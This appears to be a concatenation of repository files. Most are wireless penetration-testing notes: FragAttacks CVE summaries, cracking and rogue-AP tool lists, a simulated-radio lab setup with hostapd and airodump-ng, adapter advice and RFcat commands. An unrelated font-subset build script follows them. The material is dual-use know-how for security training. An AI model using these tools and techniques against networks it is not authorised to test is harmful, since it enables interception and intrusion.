A-MSDU frames, which is mandatory as part of 802.11n, an adversary can abuse this to inject arbitrary network packets. - **CVE-2020-24587: Reassembling fragments encrypted under different keys**: The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that all fragments of a frame are encrypted under the same key. An adversary can abuse this to exfiltrate selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP encryption key is periodically renewed. - **CVE-2020-24586: Not clearing fragments from memory when (re)connecting to a network:** The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that received fragments must be cleared from memory after (re)connecting to a network. Under the right circumstances, when another device sends fragmented frames encrypted using WEP, CCMP, or GCMP, this can be abused to inject arbitrary network packets and/or exfiltrate user data. ## Implementation flaws allowing trivial packet injection - **CVE-2020-26145: Accepting plaintext broadcast fragments as full frames (in an encrypted network)**: Vulnerable WEP, WPA, WPA2, or WPA3 implementations accept second (or subsequent) broadcast fragments even when sent in plaintext and process them as full unfragmented frames. An adversary can abuse this to inject arbitrary network packets independent of the network configuration. - **CVE-2020-26144: Accepting plaintext A-MSDU frames that start with an RFC1042 header with EtherType EAPOL (in an encrypted network)**: Vulnerable Wi-Fi implementations accept plaintext A-MSDU frames as long as the first 8 bytes correspond to a valid RFC1042 (i.e., LLC/SNAP) header for EAPOL. An adversary can abuse this to inject arbitrary network packets independent of the network configuration. - **CVE-2020-26140: Accepting plaintext data frames in a protected network**: Vulnerable WEP, WPA, WPA2, or WPA3 implementations accept plaintext frames in a protected Wi-Fi network. An adversary can abuse this to inject arbitrary data frames independent of the network configuration. - **CVE-2020-26143: Accepting _fragmented_ plaintext data frames in a protected network**: Vulnerable WEP, WPA, WPA2, or WPA3 implementations accept fragmented plaintext frames in a protected Wi-Fi network. An adversary can abuse this to inject arbitrary data frames independent of the network configuration. #### Other Implementation Vulnerabilities - **CVE-2020-26139: Forwarding EAPOL frames even though the sender is not yet authenticated**: Vulnerable Access Points (APs) forward EAPOL frames to other clients even though the sender has not yet successfully authenticated to the AP. An adversary might be able to abuse this in projected Wi-Fi networks to launch denial-of-service attacks against connected clients, and this makes it easier to exploit other vulnerabilities in connected clients. - **CVE-2020-26146: Reassembling encrypted fragments with non-consecutive packet numbers**: Vulnerable WPA, WPA2, or WPA3 implementations reassemble fragments with non-consecutive packet numbers. An adversary can abuse this to exfiltrate selected fragments. This vulnerability is exploitable when another device sends fragmented frames and the WEP, CCMP, or GCMP data-confidentiality protocol is used. Note that WEP is vulnerable to this attack by design. - **CVE-2020-26147: Reassembling mixed encrypted/plaintext fragments**: Vulnerable WEP, WPA, WPA2, or WPA3 implementations reassemble fragments even though some of them were sent in plaintext. This vulnerability can be abused to inject packets and/or exfiltrate selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP data-confidentiality protocol is used. - **CVE-2020-26142: Processing fragmented frames as full frames**: Vulnerable WEP, WPA, WPA2, or WPA3 implementations treat fragmented frames as full frames. An adversary can abuse this to inject arbitrary network packets, independent of the network configuration. - **CVE-2020-26141: Not verifying the TKIP MIC of fragmented frames**: Vulnerable Wi-Fi implementations do not verify the Message Integrity Check (authenticity) of fragmented TKIP frames. An adversary can abuse this to inject and possibly decrypt packets in WPA or WPA2 networks that support the TKIP data-confidentiality protocol.
Markdown
h4cker/wireless_resources/tools_and_online_resources.md
# Tools ## Hak5's Wi-Fi Pineapple Fully-integrated Wi-Fi man-in-the-middle platform and rogue access point. * [Site](https://www.wifipineapple.com/) * [Store](https://hakshop.com/products/wifi-pineapple) * [Wiki](https://wiki.wifipineapple.com/) ## Aircrack-ng Complete suite of tools to monitor, capture, export, attack and crack wireless networks. * [Site](https://www.aircrack-ng.org/) ## Airsnort * [Site](https://sourceforge.net/projects/airsnort/) ## Kismet Useful for troubleshooting Wi-Fi networks. Detects hidden networks. * [Site](https://www.kismetwireless.net/) ## Kismac-ng Network stumbling tool that works on Mac OS X and features support for built-in WLAN NICs on some Macs. * [Site](http://kismac-ng.org/) ## Fern WiFi Cracker Automated cracking and nice monitoring capabilities. Very easy to use. * [Site](http://www.fern-pro.com/) ## Cowpatty Features offline dictionary cracking for WPA networks. * [Site](http://www.willhackforsushi.com/?page_id=50) ## Ghost Phisher Tool designed around sniffing passwords with an AP emulator, DHCP/DNS/HTTP server and logging to a built-in database. * [Site](https://github.com/savio-code/ghost-phisher) # Online Wireless Resources ## Wigle.net Consolidated location and information of wireless networks world-wide in a centralized database--queried and updated via web app, native clients and mobile applications. * [Site](https://wigle.net/)
Markdown
h4cker/wireless_resources/virtual_adapters.md
# Using Kernel Modules to Simulate Wireless Adapters to Practice Pen Testing You can use mac80211_hwsim is a software simulator of 802.11 radio(s) for mac80211 in Kali Linux and other penetration testing distributions like Parrot. [mac80211_hwsim](https://wireless.wiki.kernel.org/en/users/drivers/mac80211_hwsim) kernel module has a parameter 'radios' that can be used to select how many radios are simulated (default 2). This allows configuration of both very simply setups (e.g., just a single access point and a station) or large scale tests (multiple access points with hundreds of stations). The following site provides a description: - https://wireless.wiki.kernel.org/en/users/drivers/mac80211_hwsim ## Starting the Kernel Module in Kali In my Kali Linux box, I have only one active interface (eth0). ``` root@kali:~# ip -brie a lo UNKNOWN 127.0.0.1/8 ::1/128 eth0 UP 172.16.217.170/24 fe80::20c:29ff:fe3c:82b0/64 ``` I am starting the simulator kernel module with the `modprobe mac80211_hwsim` command: ``` root@kali:~# modprobe mac80211_hwsim ``` After starting the module, the wireless interfaces are shown: ``` root@kali:~# ip -brie a lo UNKNOWN 127.0.0.1/8 ::1/128 eth0 UP 172.16.217.170/24 fe80::20c:29ff:fe3c:82b0/64 wlan0 DOWN wlan1 DOWN hwsim0 DOWN ``` You can then install `hostapd` to create a wireless access point and then use aircrack-ng to perform wireless assessments. ## Install and Configure hostapd You can then install `hostapd`, as shown below: ``` root@kali:~# sudo apt install hostapd Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: hostapd 0 upgraded, 1 newly installed, 0 to remove and 1748 not upgraded. Need to get 608 kB of archives. After this operation, 1,549 kB of additional disk space will be used. Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 hostapd amd64 2:2.6-18 [608 kB] Fetched 608 kB in 2s (301 kB/s) Selecting previously unselected package hostapd. (Reading database ... 353210 files and directories currently installed.) Preparing to unpack .../hostapd_2%3a2.6-18_amd64.deb ... Unpacking hostapd (2:2.6-18) ... Setting up hostapd (2:2.6-18) ... Created symlink /etc/systemd/system/hostapd.service → /dev/null. update-rc.d: We have no instructions for the hostapd init script. update-rc.d: It looks like a network service, we disable it. Processing triggers for systemd (238-4) ... Processing triggers for man-db (2.8.2-1) ... Scanning processes... Scanning candidates... Scanning processor microcode... Scanning linux images... Running kernel seems to be up-to-date. No services need to be restarted. No containers need to be restarted. User sessions running outdated binaries: root @ session #3: bash[1599] root@kali:~# hostapd hostapd v2.6 User space daemon for IEEE 802.11 AP management, IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator Copyright (c) 2002-2016, Jouni Malinen <[email protected]> and contributors usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] \ [-g <global ctrl_iface>] [-G <group>]\ [-i <comma-separated list of interface names>]\ <configuration file(s)> options: -h show this usage -d show more debug messages (-dd for even more) -B run daemon in the background -e entropy file -g global control interface path -G group for control interfaces -P PID file -K include key data in debug messages -f log output to debug file instead of stdout -T = record to Linux tracing in addition to logging (records all messages regardless of debug verbosity) -i list of interface names to use -S start all the interfaces synchronously -t include timestamps in some debug messages -v show hostapd version root@kali:~# ``` **Note:** You can obtain the example of my `hostapd.conf` file [here](https://github.com/The-Art-of-Hacking/h4cker/blob/master/wireless_resources/hostapd.conf). In my case, I ran into the following problem: ``` root@kali:# hostapd /etc/hostapd/hostapd.conf Configuration file: /etc/hostapd/hostapd.conf nl80211: Could not configure driver mode nl80211: deinit ifname=wlan0 disabled_11b_rates=0 nl80211 driver initialization failed. wlan0: interface state UNINITIALIZED->DISABLED wlan0: AP-DISABLED hostapd_free_hapd_data: Interface wlan0 wasn't started ``` I fixed it as follows: ``` root@kali:# sudo nmcli radio wifi off root@kali:# sudo rfkill unblock wlan root@kali:# sudo ifconfig wlan0 10.15.0.1/24 up root@kali:# hostapd /etc/hostapd/hostapd.conf Configuration file: /etc/hostapd/hostapd.conf Using interface wlan0 with hwaddr 26:6f:2b:e1:48:d1 and ssid "corp-net" wlan0: interface state UNINITIALIZED->ENABLED wlan0: AP-ENABLED ``` ## Running aircrack-ng If you are not familiar with aircrack-ng, you can watch the video course at: https://h4cker.org/wireless Let's start `airmon-ng` and then launch `airodump-ng` just to test our configuration: ``` root@kali:~# airmon-ng start wlan1 Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 544 NetworkManager 576 dhclient 723 wpa_supplicant PHY Interface Driver Chipset phy0 wlan0 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211 phy1 wlan1 mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211 (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon) (mac80211 station mode vif disabled for [phy1]wlan1) root@kali:~# ``` Now, let's run airodump-ng: ``` root@kali:~# airodump-ng wlan1mon ``` You should see the corp-net SSID that is configured in the hostapd.conf file. ``` CH 12 ][ Elapsed: 6 s ][ 2018-11-27 23:02 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 26:6F:2B:E1:48:D1 -29 5 0 0 11 54 WPA TKIP MGT corp-net BSSID STATION PWR Rate Lost Frames Probe ``` ## Installing DHCP server Dnsmasq is going to act as our DNS and DHCP server, it can be installed with apt-get install dnsmasq. This is another super simple service with an easy to understand config file. Below is what I used, it defines a DHCP range, sets the router and DNS servers as 10.0.0.1 (options 3 and 6) and sets our upstream DNS server to one of OpenDNS's public DNS servers (server=208.67.222.222). ``` interface=wlan0 dhcp-range=10.0.0.10,10.0.0.100,8h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=208.67.222.222 log-queries log-dhcp ```
Markdown
h4cker/wireless_resources/wireless_adapters.md
# Penetration Testing and Wireless Adapters As you learned either in one of my books, courses, or in the Internet, there are many challenges with different wireless adapters, Linux, and wireless penetration testing tools. This is a fact especially when trying to perform promiscuous monitoring and injecting packets into the wireless network. The following are some of the most popular wireless adapters used by penetration testers (ethical hackers) in the industry. **Note**: If you know of others and have some success stories, please feel free to contribute by requesting a pull request or by opening a GitHub issue. ## Good Resources of Field Tested Wireless Adapters - [Select a Field-Tested Kali Linux Compatible Wireless Adapter](https://null-byte.wonderhowto.com/how-to/select-field-tested-kali-linux-compatible-wireless-adapter-0180076/) - [Best Wireless Network Adapter for Wi-Fi ](https://null-byte.wonderhowto.com/how-to/buy-best-wireless-network-adapter-for-wi-fi-hacking-2018-0178550/) ## Additional Notes Based on My Personal Testing ### Atheros (AR5XXX, AR9XXX) Atheros chipsets have been used by many pen testers in the industry because the ability to perform well with many different systems and because it is open source. The main challenge with these drivers is that many laptops have migrated from PCMCIA bus and support for external Atheros-based cards is pretty limited. ### Realtek (RTL8187) The RTL8187 driver is used in many Alfa adapters (USB adapters). The RTL8187 driver is supported by the Linux kernel for years and has been the choice for many pen testers out there. The main challenge with this driver is the lack of 802.11 a, n, and ac support. It can be used for injecting packets into the wireless network and it works with MAC OS X. ### Intel Pro Wireless (iwlwifi) Many vendors out there use Intel 802.11 chipsets in their laptops and desktop systems in the PCIe bus. **Note:** Latest versions of the Intel chipsets are supported by the `iwlwifi` or the `iwlagn` Linux drivers and supported by recent kernels. ### The Alfa External Wireless Adapters The Alfa adapters have been used by many pen testers in the industry for years. #### The original Alfa AWUS306H This is the legacy model and basically obsolete. #### The Alfa AWUS036NEH Is the newer version of the AWUS306H and provides support for 802.11n and it is smaller than its predecessor. One of the main challenges out there is that it is not supported by MAC OS X with KisMAC. However, many people use them in laptops or desktop machines using Kali Linux. #### The Alfa Atheros AR9271 AWUS036NHA Compatible with 802.11b, 802.11g or 802.11n using 2.4 GHZ wavelength. #### The Alfa AWUS051NH It's basically the same as the AWUS036NEH, but it adds support for 5 GHz. It is also not supported by MAC OS X. #### Panda PAU05 The Panda PAU05 is a 2.4 GHz wireless N adapter that uses the Ralink RT3070 Chipset. #### TP-Link TL-WN722N (100mW) Very cheap and compatible with Kali Linux. It is not perfect for packet injection. #### TP-Link N150 Wireless High Gain USB Adapter (TL-WN722N) The TP-LINK TL-WN722N uses the Atheros AR9271 Chipset and is a wireless N adapter. Newer versions may not use the same chipset and you may run into problems with Kali Linux. ## WiFi Pineapple [Hak5's Wifi Pineapple](https://shop.hak5.org/products/wifi-pineapple) is a very comprehensive framework (hardware and software) that can be used to easily launch several WiFi attacks.
Markdown
h4cker/wireless_resources/yardstick_one_rfcat.md
# The Yardstick One and RFcat Notes As we covered in the Wireless Hacking video course, the Yardstick One is a very useful piece of hardware to perform testing of RF devices that communicate in frequencies under 1GHz. It can be combined with many tools, including RFcat. The following are a few links and resources that we discussed in the video course related to these tools: ## Yardstick One * Yardstick One website: https://greatscottgadgets.com/2015/09-30-introducing-yard-stick-one/ ## RFcat * RFcat website: https://bitbucket.org/atlas0fd00m/rfcat The following are several useful RFcat commands: * `d._debug = 1` – dumps debug messages to the screen * `d.debug()` - prints state information every second * `d.discover()` - listens for specific SYNCWORDS * `d.lowball()` - disables most “filters” to see more packets * `d.lowballRestore()` - restores the configuration before calling lowball() * `d.RFlisten()` - listens for signals and dumps data to the screen * `d.RFcapture()` - dumps data to screen, returns list of packets * `d.scan()` - scans a configurable frequency range * `d.setChannel()` - sets the channel to be used * `d.setFHSSstate()` - sets the FHSS state to be used * `d.setFreq()` - sets the frequency to be used * `d.specan()` - a spectrum analyzer * `print d.reprRadioConfig()` - prints the radio configuration details
Markdown
h4cker/wireless_resources/z-wave.md
# Z-Wave Resources and Tools ## Tools: * EZ-Wave - https://github.com/cureHsu/EZ-Wave * RFCrack - https://github.com/cclabsInc/RFCrack * RFCat - see [Yardstick One and RFCat Resources](https://github.com/The-Art-of-Hacking/art-of-hacking/blob/master/wireless_resources/yardstick_one_rfcat.md) * Yardstick One - see [Yardstick One and RFCat Resources](https://github.com/The-Art-of-Hacking/art-of-hacking/blob/master/wireless_resources/yardstick_one_rfcat.md) * HackRF One - https://greatscottgadgets.com/hackrf * Z-Attack - https://github.com/advens/Z-Attack * rfpwnon - https://github.com/exploitagency/github-rfpwnon * Z-Force - https://code.google.com/archive/p/z-force/
Markdown
h4cker/wireless_resources/zigbee_resources.md
# ZigBee Resources * Good explanation and introduction to Zigbee: http://resources.infosecinstitute.com/hacking-zigbee-networks/ * KillerBee Presentation: http://www.willhackforsushi.com/presentations/toorcon11-wright.pdf * KillerBee Framework: https://github.com/riverloopsec/killerbee * The KillerBee framework is being expanded to support multiple devices. Currently there is support for the River Loop ApiMote, Atmel RZ RAVEN USB Stick, MoteIV Tmote Sky, TelosB mote, and Sewino Sniffer. * Open source hardware: https://github.com/riverloopsec/apimote * Attify ZigBee Framework GitHub Repo: https://github.com/attify/Attify-Zigbee-Framework
Shell Script
Hack/build-subsets.sh
#!/bin/sh # ////////////////////////////////////////////////////////////////////// # # build-subsets.sh # A shell script that builds the Hack web font subsets from UFO source # Copyright 2018 Christopher Simpkins # MIT License # # Usage: ./build-subsets.sh # # NOTE: must install build dependencies in: # 1) build-ttf.sh # 2) build-woff.sh # 3) build-woff2.sh # before you execute this script. You can do this with: # # # $ ./build-ttf.sh --install-dependencies # $ ./build-woff.sh --install-dependencies # $ ./build-woff2.sh --install-dependencies # # ////////////////////////////////////////////////////////////////////// # ttfautohint local install path from Werner Lemberg's ttfautohint-build.sh install script # - This is revised to ttfautohint on the user's PATH if this local install is not identified # then the identified ttfautohint is used to execute hinting. Versions of ttfautohint < 1.6 exit with status # code 1 due to use of -R option # - The intent is to support use of ttfautohint installed on a user's PATH (e.g. they've previously installed it) TTFAH="$HOME/ttfautohint-build/local/bin/ttfautohint" # The sfnt2woff-zopfli build directory. SFNTWOFF_BUILD="$HOME/sfnt2woff-zopfli-build" # sfnt2woff-zopfli version SFNTWOFF_VERSION="1.1.0" SFNTWOFF="sfnt2woff-zopfli-$SFNTWOFF_VERSION" # Path to sfnt2woff-zopfli executable SFNTWOFF_BIN="$SFNTWOFF_BUILD/$SFNTWOFF/sfnt2woff-zopfli" ZOPFLI_ITERATIONS="3" # The woff2 git clone directory. WOFF2_BUILD="$HOME" # woff2 executable path WOFF2_BIN="$WOFF2_BUILD/woff2/woff2_compress" # temporary source directory for subset source files TEMP_SOURCE="source/temp" # The font build directory paths and file paths for the woff builds TTF_BUILD="master_ttf" REGULAR_TTF="Hack-Regular.ttf" REGULAR_WOFF_PRE="Hack-Regular.woff" REGULAR_WOFF="hack-regular-subset.woff" REGULAR_WOFF2_PRE="Hack-Regular.woff2" REGULAR_WOFF2="hack-regular-subset.woff2" BOLD_TTF="Hack-Bold.ttf" BOLD_WOFF_PRE="Hack-Bold.woff" BOLD_WOFF="hack-bold-subset.woff" BOLD_WOFF2_PRE="Hack-Bold.woff2" BOLD_WOFF2="hack-bold-subset.woff2" ITALIC_TTF="Hack-Italic.ttf" ITALIC_WOFF_PRE="Hack-Italic.woff" ITALIC_WOFF="hack-italic-subset.woff" ITALIC_WOFF2_PRE="Hack-Italic.woff2" ITALIC_WOFF2="hack-italic-subset.woff2" BOLDITALIC_TTF="Hack-BoldItalic.ttf" BOLDITALIC_WOFF_PRE="Hack-BoldItalic.woff" BOLDITALIC_WOFF="hack-bolditalic-subset.woff" BOLDITALIC_WOFF2_PRE="Hack-BoldItalic.woff2" BOLDITALIC_WOFF2="hack-bolditalic-subset.woff2" # release directory path for web fonts WEB_BUILD="build/web/fonts" # test for number of arguments if [ $# -gt 0 ] then echo "Inappropriate arguments included in your command." 1>&2 echo "Usage: ./build-subsets.sh" 1>&2 exit 1 fi # //////////////////////////////////////// # # # Confirm that dependencies are installed # # # //////////////////////////////////////// INSTALLFLAG=0 echo "Confirming that build dependencies are installed..." echo " " # fontmake installed if ! which fontmake then echo "fontmake was not found. Please install all build dependencies with 'make build-with-dependencies', then attempt your build again." 1>&2 INSTALLFLAG=1 fi # fontTools python library can be imported if ! python -c "import fontTools" then echo "The fontTools library was not found. Please install all build dependencies with 'make build-with-dependencies', then attempt your build again." 1>&2 INSTALLFLAG=1 else echo "fontTools Python library identified" fi # ttfautohint installed # - tests for install to local path from ttfautohint-build.sh script # - if not found on this path, tests for install on system PATH - if found, revises TTFAH to the string "ttfautohint" for execution of instruction sets if ! [ -f "$TTFAH" ] then if ! which ttfautohint then echo "ttfautohint was not found. Please install all build dependencies with 'make build-with-dependencies', then attempt your build again." 1>&2 INSTALLFLAG=1 else TTFAH="ttfautohint" # revise TTFAH variable to ttfautohint installed on the user's PATH for excecution of hints below echo "ttfautohint executable identified" fi else echo "ttfautohint executable identified" fi # sfntwoff-zopfli installed if ! [ -f "$SFNTWOFF_BIN" ] then echo "sfnt2woff-zopfli was not found on the path $SFNTWOFF_BIN. Please install all build dependencies with 'make build-with-dependencies', then attempt your build again." 1>&2 INSTALLFLAG=1 else echo "sfnt2woff-zopfli executable identified" fi # woff2 installed if ! [ -f "$WOFF2_BIN" ] then echo "woff2_compress was not found on the path $WOFF2_BIN. Please install all build dependencies with 'make build-with-dependencies', then attempt your build again." 1>&2 INSTALLFLAG=1 else echo "woff2_compress executable identified" fi # if any of the dependency installs failed, exit and do not attempt build, notify user if [ $INSTALLFLAG -eq 1 ] then echo "Build canceled." 1>&2 exit 1 fi # //////////////////////////////////////////////// # # # Create temporary source files with lib.plist # replacements that include subset definitions # # # //////////////////////////////////////////////// # cleanup any previously created temp directory that was not removed if ! [ -d "$TEMP_SOURCE" ]; then rm -rf $TEMP_SOURCE fi # create temp directory for subset source files mkdir $TEMP_SOURCE # copy source to temporary directory cp -r source/Hack-Regular.ufo $TEMP_SOURCE/Hack-Regular.ufo cp -r source/Hack-Italic.ufo $TEMP_SOURCE/Hack-Italic.ufo cp -r source/Hack-Bold.ufo $TEMP_SOURCE/Hack-Bold.ufo cp -r source/Hack-BoldItalic.ufo $TEMP_SOURCE/Hack-BoldItalic.ufo # copy lib.plist files with subset definitions to temporary source directories cp source/subset-lib/lib-regular.plist $TEMP_SOURCE/Hack-Regular.ufo/lib.plist cp source/subset-lib/lib-italic.plist $TEMP_SOURCE/Hack-Italic.ufo/lib.plist cp source/subset-lib/lib-bold.plist $TEMP_SOURCE/Hack-Bold.ufo/lib.plist cp source/subset-lib/lib-bolditalic.plist $TEMP_SOURCE/Hack-BoldItalic.ufo/lib.plist # ///////////////////////////////////////////// # # # Begin subset ttf font build from UFO source # # # ///////////////////////////////////////////// echo "Starting web font subset build..." echo " " # remove master_ttf directory if a previous build failed + exited early and it was not cleaned up if [ -d "master_ttf" ]; then rm -rf master_ttf fi # build regular subset if ! fontmake --subset -u "$TEMP_SOURCE/Hack-Regular.ufo" -o ttf then echo "Unable to build the Hack-Regular variant subset. Build canceled." 1>&2 exit 1 fi # build bold subset if ! fontmake --subset -u "$TEMP_SOURCE/Hack-Bold.ufo" -o ttf then echo "Unable to build the Hack-Bold variant subset. Build canceled." 1>&2 exit 1 fi # build italic subset if ! fontmake --subset -u "$TEMP_SOURCE/Hack-Italic.ufo" -o ttf then echo "Unable to build the Hack-Italic variant subset. Build canceled." 1>&2 exit 1 fi # build bold italic subset if ! fontmake --subset -u "$TEMP_SOURCE/Hack-BoldItalic.ufo" -o ttf then echo "Unable to build the Hack-BoldItalic variant subset. Build canceled." 1>&2 exit 1 fi # ///////////////////////////////////////////// # # # Post build fixes # # # ///////////////////////////////////////////// # DSIG table fix with adapted fontbakery Python script echo " " echo "Attempting DSIG table fixes with fontbakery..." echo " " if ! python postbuild_processing/fixes/fix-dsig.py master_ttf/*.ttf then echo "Unable to complete DSIG table fixes on the release files" exit 1 fi # fstype value fix with adapted fontbakery Python script echo " " echo "Attempting fstype fixes with fontbakery..." echo " " if ! python postbuild_processing/fixes/fix-fstype.py master_ttf/*.ttf then echo "Unable to complete fstype fixes on the release files" exit 1 fi # ///////////////////////////////////////////// # # # Hinting of ttf subsets # # # ///////////////////////////////////////////// echo " " echo "Attempting ttfautohint hinting..." echo " " # make a temporary directory for the hinted files mkdir master_ttf/hinted # Hack-Regular.ttf if ! "$TTFAH" -l 6 -r 50 -x 10 -H 181 -D latn -f latn -w G -W -t -X "" -I -R "master_ttf/Hack-Regular.ttf" -m "postbuild_processing/tt-hinting/Hack-Regular-TA.txt" "master_ttf/Hack-Regular.ttf" "master_ttf/hinted/Hack-Regular.ttf" then echo "Unable to execute ttfautohint on the Hack-Regular variant subset. Build canceled." 1>&2 exit 1 fi echo "master_ttf/Hack-Regular.ttf subset - successful hinting with ttfautohint" # Hack-Bold.ttf if ! "$TTFAH" -l 6 -r 50 -x 10 -H 260 -D latn -f latn -w G -W -t -X "" -I -R "master_ttf/Hack-Regular.ttf" -m "postbuild_processing/tt-hinting/Hack-Bold-TA.txt" "master_ttf/Hack-Bold.ttf" "master_ttf/hinted/Hack-Bold.ttf" then echo "Unable to execute ttfautohint on the Hack-Bold variant subset. Build canceled." 1>&2 exit 1 fi echo "master_ttf/Hack-Bold.ttf subset - successful hinting with ttfautohint" # Hack-Italic.ttf if ! "$TTFAH" -l 6 -r 50 -x 10 -H 145 -D latn -f latn -w G -W -t -X "" -I -R "master_ttf/Hack-Regular.ttf" -m "postbuild_processing/tt-hinting/Hack-Italic-TA.txt" "master_ttf/Hack-Italic.ttf" "master_ttf/hinted/Hack-Italic.ttf" then echo "Unable to execute ttfautohint on the Hack-Italic variant subset. Build canceled." 1>&2 exit 1 fi echo "master_ttf/Hack-Italic.ttf subset - successful hinting with ttfautohint" # Hack-BoldItalic.ttf if ! "$TTFAH" -l 6 -r 50 -x 10 -H 265 -D latn -f latn -w G -W -t -X "" -I -R "master_ttf/Hack-Regular.ttf" -m "postbuild_processing/tt-hinting/Hack-BoldItalic-TA.txt" "master_ttf/Hack-BoldItalic.ttf" "master_ttf/hinted/Hack-BoldItalic.ttf" then echo "Unable to execute ttfautohint on the Hack-BoldItalic variant subset. Build canceled." 1>&2 exit 1 fi echo "master_ttf/Hack-BoldItalic.ttf subset - successful hinting with ttfautohint" echo " " # ///////////////////////////////////////////// # # # Build woff subsets # # # ///////////////////////////////////////////// # regular set if ! "$SFNTWOFF_BIN" -n $ZOPFLI_ITERATIONS "$TTF_BUILD/$REGULAR_TTF"; then echo "Failed to build $REGULAR_WOFF from $REGULAR_TTF." 1>&2 exit 1 else echo "Regular woff subset successfully built from $REGULAR_TTF" fi # bold set if ! "$SFNTWOFF_BIN" -n $ZOPFLI_ITERATIONS "$TTF_BUILD/$BOLD_TTF"; then echo "Failed to build $BOLD_WOFF from $BOLD_TTF" 1>&2 exit 1 else echo "Bold woff subset successfully built from $BOLD_TTF" fi # italic set if ! "$SFNTWOFF_BIN" -n $ZOPFLI_ITERATIONS "$TTF_BUILD/$ITALIC_TTF"; then echo "Failed to build $BOLD_WOFF from $ITALIC_TTF" 1>&2 exit 1 else echo "Italic woff subset successfully built from $ITALIC_TTF" fi # bold italic set if ! "$SFNTWOFF_BIN" -n $ZOPFLI_ITERATIONS "$TTF_BUILD/$BOLDITALIC_TTF"; then echo "Failed to build $BOLDITALIC_WOFF from $BOLDITALIC_TTF" 1>&2 exit 1 else echo "Bold Italic woff subset successfully built from $BOLDITALIC_TTF" fi # ///////////////////////////////////////////// # # # Build woff2 subsets # # # ///////////////////////////////////////////// echo " " # regular set if ! "$WOFF2_BIN" "$TTF_BUILD/$REGULAR_TTF"; then echo "Failed to build woff2 subset from $REGULAR_TTF." 1>&2 exit 1 else echo "Regular woff2 font subset successfully built from $REGULAR_TTF" fi # bold set if ! "$WOFF2_BIN" "$TTF_BUILD/$BOLD_TTF"; then echo "Failed to build woff2 subset from $BOLD_TTF" 1>&2 exit 1 else echo "Bold woff2 subset successfully built from $BOLD_TTF" fi # italic set if ! "$WOFF2_BIN" "$TTF_BUILD/$ITALIC_TTF"; then echo "Failed to build woff2 subset from $ITALIC_TTF" 1>&2 exit 1 else echo "Italic woff2 subset successfully built from $ITALIC_TTF" fi # bold italic set if ! "$WOFF2_BIN" "$TTF_BUILD/$BOLDITALIC_TTF"; then echo "Failed to build woff2 subset from $BOLDITALIC_TTF" 1>&2 exit 1 else echo "Bold Italic woff2 subset successfully built from $BOLDITALIC_TTF" fi # ////////////////////////////////////////////// # # # Move web font subset files to build directory # # # ////////////////////////////////////////////// # create the build directory if it does not exist if ! [ -d "$WEB_BUILD" ]; then mkdir $WEB_BUILD fi echo " " echo "Moving woff files to build directory..." # move woff files to appropriate build directory mv "$TTF_BUILD/$REGULAR_WOFF_PRE" "$WEB_BUILD/$REGULAR_WOFF" mv "$TTF_BUILD/$BOLD_WOFF_PRE" "$WEB_BUILD/$BOLD_WOFF" mv "$TTF_BUILD/$ITALIC_WOFF_PRE" "$WEB_BUILD/$ITALIC_WOFF" mv "$TTF_BUILD/$BOLDITALIC_WOFF_PRE" "$WEB_BUILD/$BOLDITALIC_WOFF" if [ -f "$WEB_BUILD/$REGULAR_WOFF" ]; then echo "Regular woff build path: $WEB_BUILD/$REGULAR_WOFF" fi if [ -f "$WEB_BUILD/$BOLD_WOFF" ]; then echo "Bold woff build path: $WEB_BUILD/$BOLD_WOFF" fi if [ -f "$WEB_BUILD/$ITALIC_WOFF" ]; then echo "Italic woff build path: $WEB_BUILD/$ITALIC_WOFF" fi if [ -f "$WEB_BUILD/$BOLDITALIC_WOFF" ]; then echo "Bold Italic woff build path: $WEB_BUILD/$BOLDITALIC_WOFF" fi echo "Moving woff2 files to build directory..." # move woff files to appropriate build directory mv "$TTF_BUILD/$REGULAR_WOFF2_PRE" "$WEB_BUILD/$REGULAR_WOFF2" mv "$TTF_BUILD/$BOLD_WOFF2_PRE" "$WEB_BUILD/$BOLD_WOFF2" mv "$TTF_BUILD/$ITALIC_WOFF2_PRE" "$WEB_BUILD/$ITALIC_WOFF2" mv "$TTF_BUILD/$BOLDITALIC_WOFF2_PRE" "$WEB_BUILD/$BOLDITALIC_WOFF2" if [ -f "$WEB_BUILD/$REGULAR_WOFF2" ]; then echo "Regular woff2 subset build path: $WEB_BUILD/$REGULAR_WOFF2" fi if [ -f "$WEB_BUILD/$BOLD_WOFF2" ]; then echo "Bold woff2 subset build path: $WEB_BUILD/$BOLD_WOFF2" fi if [ -f "$WEB_BUILD/$ITALIC_WOFF2" ]; then echo "Italic woff2 subset build path: $WEB_BUILD/$ITALIC_WOFF2" fi if [ -f "$WEB_BUILD/$BOLDITALIC_WOFF2" ]; then echo "Bold Italic woff2 subset build path: $WEB_BUILD/$BOLDITALIC_WOFF2" fi # ////////////////////////////////////////////// # # # Cleanup temp directory # # # ////////////////////////////////////////////// rm -rf master_ttf rm -rf "$TEMP_SOURCE"
Shell Script
Hack/build-ttf.sh
